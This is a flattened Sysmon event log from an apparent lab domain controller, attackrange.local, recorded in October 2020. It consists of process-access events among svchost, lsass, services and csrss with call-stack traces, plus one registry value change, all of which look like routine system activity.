08:41:06.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000887Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000886Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000885Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.012{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000884Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.012{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000883Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.012{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 13241300x8000000000000000882Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-SetValue2020-10-12 08:41:06.012{5D479F2C-16A1-5F84-1200-000000007F01}1208C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{00F54EB2-9682-4BF2-AA7E-3E1C11352C46}\DateLastConnectedBinary Data 10341000x8000000000000000881Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.996{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1700-000000007F01}1840C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000880Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.996{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000879Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.996{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000878Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.996{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000877Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.996{5D479F2C-169F-5F84-0A00-000000007F01}856940C:\Windows\system32\services.exe{5D479F2C-16A1-5F84-1700-000000007F01}1840C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000876Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.980{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1700-000000007F01}1840C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000875Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.980{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000874Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.980{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000873Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.980{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000872Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.980{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16A1-5F84-1700-000000007F01}1840C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000871Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.980{5D479F2C-169F-5F84-0A00-000000007F01}8561152C:\Windows\system32\services.exe{5D479F2C-16A1-5F84-1700-000000007F01}1840C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000870Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.980{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000869Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.980{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000868Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.980{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000867Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.965{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000866Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.965{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000865Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.965{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000864Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.965{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000863Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.965{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000862Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 